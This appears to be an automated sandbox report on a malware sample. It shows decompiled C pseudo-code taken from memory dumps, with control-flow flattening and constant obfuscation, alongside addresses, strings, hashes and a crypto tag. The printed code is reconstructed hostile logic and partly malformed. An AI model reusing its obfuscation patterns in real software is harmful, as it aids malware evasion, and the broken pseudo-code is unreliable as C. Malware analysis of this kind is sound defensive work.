									_pop(_t524);
									_t574 = 0x1e3f4be6;
									while(1) {
										L1:
										_t475 = 0x1359b45f;
										goto L2;
									}
								} else {
									if(_t574 == 0xb2e7f16) {
										_t524 = _v1748;
										_t500 = E00221773(_v1752, _v1584, _v1580, _v1652, _v1788);
										_t508 = _t500;
										_t580 = _t580 + 0x10;
										__eflags = _t500;
										_t475 = 0x1359b45f;
										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
										continue;
									} else {
										if(_t574 == 0xbe4541e) {
											_push(_t524);
											_push(_v1660);
											_push(0);
											_push(_v1608);
											_push(0);
											_push(_v1764);
											_t524 = _v1696;
											_push( &_v1564);
											E0021568E(_t524, 1);
											_t580 = _t580 + 0x1c;
											_t574 = 0x589c6e4;
											while(1) {
												L1:
												_t475 = 0x1359b45f;
												goto L2;
											}
										} else {
											if(_t574 == _t475) {
												_push(_v1720);
												E002129E3( &_v524, 0x104, E0022889D(0x22c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
												_t580 = _t580 + 0x24;
												E00222025(_v1596, _t503, _v1668, _v1728);
												_pop(_t524);
												_t574 = 0xbe4541e;
												while(1) {
													L1:
													_t475 = 0x1359b45f;
													goto L2;
												}
											} else {
												if(_t574 != 0x1d7e83db) {
													goto L29;
												} else {
													E00224F7D(_v1688, _v1744, _v1576);
													_pop(_t524);
													_t574 = 0x3025b1cf;
													while(1) {
														L1:
														_t475 = 0x1359b45f;
														goto L2;
													}
												}
											}
										}
									}
								}
								L23:
								return _t496;
							}
							_push(_t524);
							_t530 = 0x38;
							_t496 = E00218736(_t530);
							_t573 = _t496;
							_t532 = _t524;
							__eflags = _t573;
							if(_t573 != 0) {
								_push(_t532);
								_push(_t532);
								_t524 = _v1684;
								E0021C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
								_t580 = _t580 + 0x1c;
								_t574 = 0x2d0f1252;
								while(1) {
									L1:
									_t475 = 0x1359b45f;
									goto L2;
								}
							}
							goto L23;
						}
						__eflags = _t574 - 0x1e3f4be6;
						if(_t574 == 0x1e3f4be6) {
							E0021F536(_v1624, _v1768, _v1776, _v1584);
							_t574 = 0x1d7e83db;
							_t475 = 0x1359b45f;
							goto L29;
						} else {
							__eflags = _t574 - 0x20ae1a02;
							if(_t574 == 0x20ae1a02) {
								_v1572 = E0022388A();
								_t479 = E00220ADC(_t478, _v1800, _v1664);
								_pop(_t520);
								_v1568 = 2 + _t479 * 2;
								E0021B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
								_t580 = _t580 + 0x30;
								asm("sbb esi, esi");
								_t575 = _t574 & 0x097497a8;
								goto L25;
							} else {
								__eflags = _t574 - 0x27330c3b;
								if(_t574 == 0x27330c3b) {
									E002180BA( &_v1576, _v1680, _v1780,  &_v1584);
									asm("sbb esi, esi");
									_pop(_t524);
									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
									goto L1;
								} else {
									__eflags = _t574 - 0x2d0f1252;
									if(_t574 == 0x2d0f1252) {
										_push( &_v524);
										E002188E5(_v1588, _v1592);
										asm("sbb esi, esi");
										_t524 = 0x22c8f0;
										_t575 = _t574 & 0x02efa56f;
										__eflags = _t575;
										L25:
										_t574 = _t575 + 0x1dbe7493;
										while(1) {
											L1:
											_t475 = 0x1359b45f;
											goto L2;
										}
									} else {
										__eflags = _t574 - 0x3025b1cf;
										if(_t574 == 0x3025b1cf) {
											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
											_t491 =  *0x22ca24; // 0x0
											 *(_t573 + 0x2c) = _t491;
											 *0x22ca24 = _t573;
											return _t491;
										}
										goto L29;
									}
								}
							}
						}
						goto L23;
						L29:
						__eflags = _t574 - 0x15e8ba90;
					} while (__eflags != 0);
					return _t475;
				}
			}

0x00214a3b
0x00214a46
0x00214a51
0x00214a5c
0x00214a64
0x00214a6c
0x00214a71
0x00214a79
0x00214a81
0x00214a8c
0x00214a94
0x00214a9f
0x00214aaa
0x00214ab2
0x00214abd
0x00214ad3
0x00214ada
0x00214ae3
0x00214aea
0x00214aef
0x00214af8
0x00214b03
0x00214b0b
0x00214b13
0x00214b1b
0x00214b23
0x00214b35
0x00214b3a
0x00214b43
0x00214b4e
0x00214b5a
0x00214b5d
0x00214b61
0x00214b69
0x00214b71
0x00214b79
0x00214b81
0x00214b85
0x00214b8d
0x00214b98
0x00214ba0
0x00214bab
0x00214bb6
0x00214bc1
0x00214bcc
0x00214bd4
0x00214bdc
0x00214be4
0x00214bec
0x00214bf4
0x00214bff
0x00214c0a
0x00214c15
0x00214c20
0x00214c28
0x00214c33
0x00214c3e
0x00214c49
0x00214c54
0x00214c67
0x00214c6e
0x00214c79
0x00214c81
0x00214c89
0x00214c8e
0x00214c98
0x00214ca8
0x00214cae
0x00214cb6
0x00214cbb
0x00214cc3
0x00214cce
0x00214cd9
0x00214ce4
0x00214cec
0x00214cf1
0x00214cf9
0x00214d01
0x00214d09
0x00214d14
0x00214d1f
0x00214d2a
0x00214d32
0x00214d37
0x00214d3f
0x00214d47
0x00214d4f
0x00214d57
0x00214d5f
0x00214d67
0x00214d6f
0x00214d77
0x00214d80
0x00214d85
0x00214d8b
0x00214d93
0x00214d9e
0x00214da9
0x00214db4
0x00214dbc
0x00214dc4
0x00214dc9
0x00214dd1
0x00214dd9
0x00214de5
0x00214de8
0x00214dec
0x00214df4
0x00214dfc
0x00214e04
0x00214e09
0x00214e0e
0x00214e16
0x00214e21
0x00214e29
0x00214e34
0x00214e3c
0x00214e44
0x00214e49
0x00214e51
0x00214e64
0x00214e6b
0x00214e76
0x00214e7e
0x00214e86
0x00214e8e
0x00214e96
0x00214e9e
0x00214ea6
0x00214eae
0x00214eb6
0x00214ec1
0x00214ecc
0x00214ed7
0x00214ee4
0x00214eef
0x00214efa
0x00214f02
0x00214f0a
0x00214f12
0x00214f1a
0x00214f22
0x00214f27
0x00214f2c
0x00214f34
0x00214f3c
0x00214f4a
0x00214f4f
0x00214f5a
0x00214f5b
0x00214f5f
0x00214f67
0x00214f72
0x00214f7d
0x00214f88
0x00214f93
0x00214f9e
0x00214fa9
0x00214fb4
0x00214fbf
0x00214fca
0x00214fd7
0x00214fdb
0x00214fe3
0x00214fe8
0x00214ff0
0x00214ffb
0x00215003
0x0021500e
0x00215019
0x00215021
0x0021502c
0x00215034
0x0021503c
0x00215044
0x00215049
0x00215051
0x00215059
0x00215063
0x00215067
0x0021506f
0x00215077
0x00215082
0x0021508d
0x00215098
0x002150a0
0x002150a5
0x002150ad
0x002150b5
0x002150c0
0x002150cb
0x002150d6
0x002150e1
0x002150ee
0x002150f2
0x002150fa
0x00215102
0x0021510a
0x00215118
0x00215121
0x00215125
0x0021512d
0x00215135
0x0021513d
0x00215142
0x00215155
0x0021515a
0x00215161
0x00215163
0x0021516a
0x0021516a
0x0021516a
0x0021516f
0x0021516f
0x0021516f
0x0021516f
0x00215175
0x00000000
0x00000000
0x0021517b
0x00000000
0x002154f8
0x00215187
0x00215193
0x002152e9
0x002152ef
0x002152f0
0x0021516a
0x0021516a
0x0021516a
0x00000000
0x0021516a
0x00215199
0x0021519f
0x002152ad
0x002152b8
0x002152bd
0x002152bf
0x002152c2
0x002152c9
0x002152ce
0x00000000
0x002151a5
0x002151ab
0x0021525c
0x0021525d
0x0021526d
0x0021526f
0x00215277
0x00215279
0x0021527d
0x00215284
0x00215285
0x0021528a
0x0021528d
0x0021516a
0x0021516a
0x0021516a
0x00000000
0x0021516a
0x002151b1
0x002151b3
0x002151e0
0x0021522f
0x00215234
0x0021524b
0x00215251
0x00215252
0x0021516a
0x0021516a
0x0021516a
0x00000000
0x0021516a
0x002151b5
0x002151bb
0x00000000
0x002151c1
0x002151d3
0x002151d8
0x002151d9
0x0021516a
0x0021516a
0x0021516a
0x00000000
0x0021516a
0x0021516a
0x002151bb
0x002151b3
0x002151ab
0x0021519f
0x002153b2
0x002153b2
0x002153b2
0x0021530c
0x00215310
0x00215311
0x00215316
0x00215319
0x0021531a
0x0021531c
0x00215322
0x00215323
0x00215342
0x0021534a
0x0021534f
0x00215352
0x0021516a
0x0021516a
0x0021516a
0x00000000
0x0021516a
0x0021516a
0x00000000
0x0021531c
0x0021535c
0x00215362
0x002154bd
0x002154c4
0x002154c9
0x00000000
0x00215368
0x00215368
0x0021536e
0x00215439
0x00215440
0x00215445
0x0021545c
0x00215490
0x00215495
0x0021549a
0x0021549c
0x00000000
0x00215374
0x00215374
0x0021537a
0x00215404
0x0021540c
0x00215414
0x00215415
0x00000000
0x0021537c
0x0021537c
0x00215382
0x002153c8
0x002153ce
0x002153d6
0x002153d8
0x002153d9
0x002153d9
0x002153df
0x002153df
0x0021516a
0x0021516a
0x0021516a
0x00000000
0x0021516a
0x00215384
0x00215384
0x0021538a
0x00215397
0x0021539a
0x0021539f
0x002153a2
0x00000000
0x002153a2
0x00000000
0x0021538a
0x00215382
0x0021537a
0x0021536e
0x00000000
0x002154ce
0x002154ce
0x002154ce
0x00000000
0x0021516f

Strings

;x, xrefs: 00214D93
`+, xrefs: 00214B4E
>], xrefs: 00214CE4
P, xrefs: 00214A5C
][, xrefs: 0021512D
*X, xrefs: 00214B23
e!, xrefs: 00215102
Kc, xrefs: 00215051
h=, xrefs: 00214BAB
-*, xrefs: 00214FB4
U$, xrefs: 0021502C
6T-, xrefs: 00214CD9
WM, xrefs: 00214B8D

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
API String ID: 0-2931794159
Opcode ID: 45ec839425e989bc62ad2ffa19df0696c65ea702c3cb0b5e523c3c5cfe23e413
Instruction ID: 7c6c71f346458c25f4443991af097d1b40e1feb2a23c81f2348f970a90f22718
Opcode Fuzzy Hash: 45ec839425e989bc62ad2ffa19df0696c65ea702c3cb0b5e523c3c5cfe23e413
Instruction Fuzzy Hash: 2F323372518781DFE378CF61C54AA8BBBE1BBC4304F108A1DE5DA962A0D7B59859CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00218F78, Relevance: 15.4, Strings: 12, Instructions: 367
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00218F78(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t359;
				void* _t362;
				void* _t367;
				void* _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				void* _t394;
				void* _t395;
				signed int _t401;
				signed int _t435;
				intOrPtr _t444;
				signed int _t445;
				intOrPtr _t449;
				signed int* _t450;
				void* _t452;

				_t450 =  &_v684;
				_v548 = _v548 & 0x00000000;
				_v652 = 0x628b;
				_v652 = _v652 | 0x8ea8a6c3;
				_v652 = _v652 >> 8;
				_v652 = _v652 ^ 0x078a89dd;
				_v652 = _v652 ^ 0x0504213b;
				_v656 = 0xca44;
				_v656 = _v656 << 3;
				_v656 = _v656 >> 0xa;
				_v656 = _v656 | 0x073c6a17;
				_v656 = _v656 ^ 0x073c621f;
				_v664 = 0x16e0;
				_v664 = _v664 + 0xffffe980;
				_v664 = _v664 >> 8;
				_v544 = __edx;
				_t449 = __ecx;
				_t445 = 0x351028fa;
				_t386 = 0x6c;
				_v664 = _v664 / _t386;
				_v664 = _v664 ^ 0x00007066;
				_v640 = 0x836e;
				_v640 = _v640 + 0xb501;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x000012b9;
				_v628 = 0xb2ec;
				_t387 = 0x41;
				_v628 = _v628 * 0x46;
				_v628 = _v628 + 0xd97;
				_v628 = _v628 ^ 0x0030acaf;
				_v576 = 0x565d;
				_v576 = _v576 | 0xc8c85e8e;
				_v576 = _v576 ^ 0xc8c86b89;
				_v560 = 0xfa05;
				_v560 = _v560 + 0x1743;
				_v560 = _v560 ^ 0x00015cb0;
				_v588 = 0x54a3;
				_v588 = _v588 ^ 0x711a4c60;
				_v588 = _v588 << 6;
				_v588 = _v588 ^ 0x46864cc2;
				_v596 = 0xba14;
				_v596 = _v596 + 0xf2e8;
				_v596 = _v596 + 0x1be7;
				_v596 = _v596 ^ 0x00019f0a;
				_v660 = 0x9a1f;
				_v660 = _v660 / _t387;
				_t388 = 0x56;
				_v660 = _v660 * 0x79;
				_v660 = _v660 << 0xd;
				_v660 = _v660 ^ 0x23dca07a;
				_v676 = 0x17dc;
				_v676 = _v676 << 0xe;
				_v676 = _v676 / _t388;
				_v676 = _v676 + 0xffffccb5;
				_v676 = _v676 ^ 0x0011ad2d;
				_v636 = 0xbd70;
				_v636 = _v636 | 0x80fc5ede;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0fcfa70d;
				_v608 = 0xbaf8;
				_v608 = _v608 + 0xffff1119;
				_t389 = 0x27;
				_v608 = _v608 / _t389;
				_v608 = _v608 ^ 0x06904b29;
				_v684 = 0xf49f;
				_t390 = 0x66;
				_v684 = _v684 * 0x1f;
				_v684 = _v684 + 0xffffe502;
				_v684 = _v684 / _t390;
				_v684 = _v684 ^ 0x00005c32;
				_v668 = 0xe410;
				_v668 = _v668 >> 0xc;
				_v668 = _v668 + 0xffffc634;
				_v668 = _v668 << 0xf;
				_v668 = _v668 ^ 0xe3216c4d;
				_v620 = 0x7d49;
				_t391 = 0x24;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 ^ 0x980c0cc6;
				_v620 = _v620 ^ 0x9800e7e7;
				_v564 = 0x5c7e;
				_v564 = _v564 ^ 0x14aa654c;
				_v564 = _v564 ^ 0x14aa562a;
				_v552 = 0x450c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x0022b9f7;
				_v580 = 0x3573;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 / _t391;
				_v580 = _v580 ^ 0x000007cd;
				_v584 = 0x18cc;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 << 3;
				_v584 = _v584 ^ 0x000042dd;
				_v556 = 0x1e9b;
				_v556 = _v556 + 0xffff5daa;
				_v556 = _v556 ^ 0xffff6e35;
				_v568 = 0x1617;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x000112eb;
				_v572 = 0xca92;
				_v572 = _v572 + 0x7b62;
				_v572 = _v572 ^ 0x00017fbb;
				_v592 = 0xd72f;
				_v592 = _v592 | 0xe23ccaf6;
				_v592 = _v592 + 0x7d96;
				_v592 = _v592 ^ 0xe23d11e5;
				_v644 = 0x4340;
				_t392 = 7;
				_v644 = _v644 * 0x73;
				_v644 = _v644 | 0x11b8a473;
				_v644 = _v644 ^ 0x11bec66f;
				_v672 = 0x4860;
				_v672 = _v672 / _t392;
				_v672 = _v672 | 0x7c31fb12;
				_v672 = _v672 ^ 0x5cc3fc4f;
				_v672 = _v672 ^ 0x20f228b2;
				_v680 = 0x617d;
				_v680 = _v680 >> 0xd;
				_v680 = _v680 | 0xd7e9f895;
				_v680 = _v680 ^ 0xd7e9e095;
				_v616 = 0xec2d;
				_v616 = _v616 + 0xebc9;
				_v616 = _v616 ^ 0x6282d746;
				_v616 = _v616 ^ 0x6283789e;
				_v600 = 0x3147;
				_v600 = _v600 >> 0xe;
				_t393 = 0x4c;
				_t383 = _v544;
				_t444 = _v544;
				_v600 = _v600 * 0x6d;
				_v600 = _v600 ^ 0x000035af;
				_v604 = 0xdf1e;
				_v604 = _v604 >> 0xa;
				_v604 = _v604 + 0xffffe311;
				_v604 = _v604 ^ 0xffffd288;
				_v612 = 0xd6ea;
				_v612 = _v612 << 0xc;
				_v612 = _v612 * 0x1c;
				_v612 = _v612 ^ 0x7819f753;
				_v624 = 0x23;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0e47f934;
				_v624 = _v624 ^ 0x0e47f086;
				_v632 = 0x3384;
				_v632 = _v632 >> 9;
				_v632 = _v632 / _t393;
				_v632 = _v632 ^ 0x000059c8;
				_v648 = 0x4bab;
				_v648 = _v648 * 0x33;
				_v648 = _v648 ^ 0xea23b576;
				_v648 = _v648 | 0x057acb41;
				_v648 = _v648 ^ 0xef7effc2;
				while(1) {
					L1:
					_t354 = 0x2d3a08fe;
					while(1) {
						L2:
						_t394 = 0x2432fb60;
						do {
							while(1) {
								L3:
								_t452 = _t445 - _t394;
								if(_t452 > 0) {
									break;
								}
								if(_t452 == 0) {
									_push( &_v524);
									_push(_t394);
									_t367 = E0021BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
									_t450 =  &(_t450[7]);
									if(_t367 != 0) {
										E00224F7D(_v552, _v580, _v540);
										E00224F7D(_v584, _v556, _v536);
									}
									_t435 = _v572;
									_push(_v548);
									_t401 = _v568;
									L21:
									E00224F7D(_t401, _t435);
									L22:
									_t445 = 0x2e38c466;
									while(1) {
										L1:
										_t354 = 0x2d3a08fe;
										goto L2;
									}
								} else {
									if(_t445 == 0xd57030c) {
										return E0021F536(_v624, _v632, _v648, _t444);
									}
									if(_t445 == 0x1b7bc3fb) {
										E0021F326();
										E0021F6DF(_t394);
										_t354 = 0x2d3a08fe;
										_t445 = 0x1f6584a2;
										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
										goto L2;
									} else {
										if(_t445 == 0x1f6584a2) {
											if(_t383 != _t354) {
												_t445 = 0x1fb1d4b9;
												continue;
											} else {
												_push(_v652);
												_push(_t394);
												_t287 =  &_v676; // 0xe3216c4d
												E002117AC(_v660,  &_v548,  *_t287, _t394);
												_t450 =  &(_t450[5]);
												asm("sbb esi, esi");
												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
												while(1) {
													L1:
													_t354 = 0x2d3a08fe;
													L2:
													_t394 = 0x2432fb60;
													goto L3;
												}
											}
										} else {
											if(_t445 != 0x1fb1d4b9) {
												goto L31;
											} else {
												_push( &_v524);
												_push(0x22c910);
												_t378 = E002188E5(_t449, _v544);
												_t354 = 0x2d3a08fe;
												if(_t378 == 0) {
													if(_t383 == 0x2d3a08fe) {
														E00224F7D(_v636, _v608, _v548);
														_t354 = 0x2d3a08fe;
													}
													_t445 = 0xd57030c;
													while(1) {
														L2:
														_t394 = 0x2432fb60;
														goto L3;
													}
												} else {
													_t394 = 0x2432fb60;
													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
													continue;
												}
											}
										}
									}
								}
								L24:
								if(_t445 != 0x351028fa) {
									if(_t445 != 0x35df9137) {
										goto L31;
									} else {
										_push(_t394);
										_push(_v680);
										_push( &_v524);
										_t312 =  &_v672; // 0x7066
										_push( *_t312);
										_push( &_v540);
										_push(_v644);
										_push(0);
										_t362 = E0021568E(_v592, 0);
										_t450 =  &(_t450[7]);
										if(_t362 == 0) {
											goto L22;
										} else {
											E00224F7D(_v616, _v600, _v540);
											_t435 = _v612;
											_push(_v536);
											_t401 = _v604;
											goto L21;
										}
										goto L28;
									}
									L34:
									return _t359;
								}
								L28:
								_push(_t394);
								_push(_t394);
								_t395 = 0x38;
								_t359 = E00218736(_t395);
								_t444 = _t359;
								if(_t444 != 0) {
									_t445 = 0x1b7bc3fb;
									goto L1;
								}
								goto L34;
							}
							if(_t445 == 0x2e38c466) {
								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
								_t445 = 0xbb47724;
								_t355 =  *0x22ca24; // 0x0
								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
								_t354 = 0x2d3a08fe;
								 *0x22ca24 = _t444;
								goto L31;
							}
							goto L24;
							L31:
						} while (_t445 != 0xbb47724);
						return _t354;
					}
				}
			}

0x00218f78
0x00218f7e
0x00218f86
0x00218f8e
0x00218f96
0x00218f9b
0x00218fa3
0x00218fab
0x00218fb3
0x00218fb8
0x00218fbd
0x00218fc5
0x00218fcd
0x00218fd5
0x00218fdd
0x00218fea
0x00218ff1
0x00218ff7
0x00218ffc
0x00219001
0x00219007
0x0021900f
0x00219017
0x0021901f
0x00219024
0x0021902c
0x00219039
0x0021903c
0x00219040
0x00219048
0x00219050
0x0021905b
0x00219066
0x00219071
0x0021907c
0x00219087
0x00219092
0x0021909a
0x002190a2
0x002190a7
0x002190af
0x002190b7
0x002190bf
0x002190c7
0x002190cf
0x002190df
0x002190e8
0x002190eb
0x002190ef
0x002190f4
0x002190fc
0x00219104
0x0021910f
0x00219113
0x0021911b
0x00219123
0x0021912b
0x00219133
0x00219138
0x00219140
0x00219148
0x00219156
0x0021915b
0x00219161
0x00219169
0x00219176
0x00219179
0x0021917d
0x0021918d
0x00219191
0x00219199
0x002191a1
0x002191a6
0x002191ae
0x002191b3
0x002191bb
0x002191c8
0x002191cb
0x002191cf
0x002191d7
0x002191df
0x002191ea
0x002191f5
0x00219200
0x0021920b
0x00219213
0x0021921e
0x00219226
0x00219233
0x00219237
0x0021923f
0x00219247
0x0021924c
0x00219251
0x00219259
0x00219264
0x0021926f
0x0021927a
0x00219285
0x0021928d
0x00219298
0x002192a3
0x002192ae
0x002192b9
0x002192c1
0x002192c9
0x002192d1
0x002192d9
0x002192e6
0x002192e7
0x002192eb
0x002192f3
0x002192fb
0x00219309
0x0021930d
0x00219315
0x0021931d
0x00219325
0x0021932d
0x00219332
0x0021933a
0x00219342
0x0021934a
0x00219352
0x0021935a
0x00219362
0x0021936a
0x00219378
0x00219379
0x00219380
0x00219387
0x0021938b
0x00219393
0x0021939b
0x002193a0
0x002193a8
0x002193b0
0x002193b8
0x002193c2
0x002193c6
0x002193ce
0x002193d6
0x002193db
0x002193e3
0x002193eb
0x002193f3
0x002193fe
0x00219402
0x0021940a
0x00219417
0x0021941b
0x00219423
0x0021942b
0x00219433
0x00219433
0x00219433
0x00219438
0x00219438
0x00219438
0x0021943d
0x0021943d
0x0021943d
0x0021943d
0x0021943f
0x00000000
0x00000000
0x00219445
0x0021955a
0x0021955b
0x0021957f
0x00219584
0x00219589
0x0021959d
0x002195b5
0x002195ba
0x002195bb
0x002195c2
0x002195c9
0x002195d0
0x002195d0
0x002195d6
0x002195d6
0x00219433
0x00219433
0x00219433
0x00000000
0x00219433
0x0021944b
0x00219451
0x00000000
0x002196c1
0x0021945d
0x0021952e
0x00219535
0x00219541
0x00219546
0x0021954b
0x00000000
0x00219463
0x00219469
0x002194d8
0x00219511
0x00000000
0x002194da
0x002194da
0x002194e5
0x002194e7
0x002194f4
0x002194f9
0x002194fe
0x00219506
0x00219433
0x00219433
0x00219433
0x00219438
0x00219438
0x00000000
0x00219438
0x00219433
0x0021946b
0x00219471
0x00000000
0x00219477
0x00219485
0x00219486
0x0021948d
0x00219495
0x0021949b
0x002194b0
0x002194c1
0x002194c7
0x002194c7
0x002194cc
0x00219438
0x00219438
0x00219438
0x00000000
0x00219438
0x0021949d
0x002194a4
0x002194a9
0x00000000
0x002194a9
0x0021949b
0x00219471
0x00219469
0x0021945d
0x002195ec
0x002195f2
0x002195fa
0x00000000
0x00219600
0x00219600
0x00219601
0x0021960e
0x0021960f
0x0021960f
0x0021961a
0x0021961b
0x00219626
0x00219628
0x0021962d
0x00219632
0x00000000
0x00219634
0x00219643
0x00219648
0x0021964d
0x00219654
0x00000000
0x00219654
0x00000000
0x00219632
0x002196cc
0x002196cc
0x002196cc
0x0021965d
0x00219669
0x0021966a
0x0021966d
0x0021966e
0x00219673
0x00219679
0x0021967b
0x00000000
0x0021967b
0x00000000
0x00219679
0x002195e6
0x00219685
0x00219688
0x0021968d
0x00219692
0x00219695
0x0021969a
0x00000000
0x0021969a
0x00000000
0x002196a0
0x002196a0
0x00000000
0x0021943d
0x00219438

Strings

Ml!, xrefs: 002194E7
}a, xrefs: 00219325
`H, xrefs: 002192FB
~\, xrefs: 002191DF
b{, xrefs: 002192A3
-, xrefs: 00219342
G1, xrefs: 00219362
#, xrefs: 002193CE
s5, xrefs: 0021921E
@C, xrefs: 002192D9
]V, xrefs: 00219050
fpMl!, xrefs: 0021960F

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
API String ID: 0-964951681
Opcode ID: 2768d958af916ddbcfc29727575f332ccc7b0b01184805003cead1823ea4d901
Instruction ID: 0206f56284b71ba7b5facc2f2f15194023f7e7b1d333ed0901c00f6169a3f7cf
Opcode Fuzzy Hash: 2768d958af916ddbcfc29727575f332ccc7b0b01184805003cead1823ea4d901
Instruction Fuzzy Hash: 7E02727250D3818FE368CF25D54AA8BFBE1BBC4708F50891DF199962A0D7B58989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0021E377, Relevance: 15.3, Strings: 12, Instructions: 321
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0021E377() {
				intOrPtr _t319;
				intOrPtr _t322;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t329;
				void* _t336;
				intOrPtr* _t368;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t374;
				intOrPtr* _t376;
				void* _t380;

				 *(_t380 + 0x90) = 0x492ac5;
				 *(_t380 + 0x94) = 0;
				 *((intOrPtr*)(_t380 + 0x98)) = 0;
				_t336 = 0x262df760;
				 *(_t380 + 0x48) = 0xf735;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
				 *(_t380 + 4) = 0x4aa3;
				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
				 *(_t380 + 4) =  *(_t380 + 4) << 4;
				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
				 *(_t380 + 0x34) = 0x5ec9;
				 *(_t380 + 0x8c) = 0;
				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
				_t371 = 0x70;
				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
				 *(_t380 + 0x60) = 0xe88e;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
				 *(_t380 + 0x58) = 0xbd5e;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
				 *(_t380 + 0x2c) = 0x606e;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
				 *(_t380 + 0x4c) = 0xb86a;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
				 *(_t380 + 0x44) = 0x5cf7;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
				 *(_t380 + 0x74) = 0xd45b;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
				 *(_t380 + 0x14) = 0x87c2;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
				 *(_t380 + 0x6c) = 0x3ddc;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
				 *(_t380 + 0x3c) = 0xc186;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
				_t372 = 0x60;
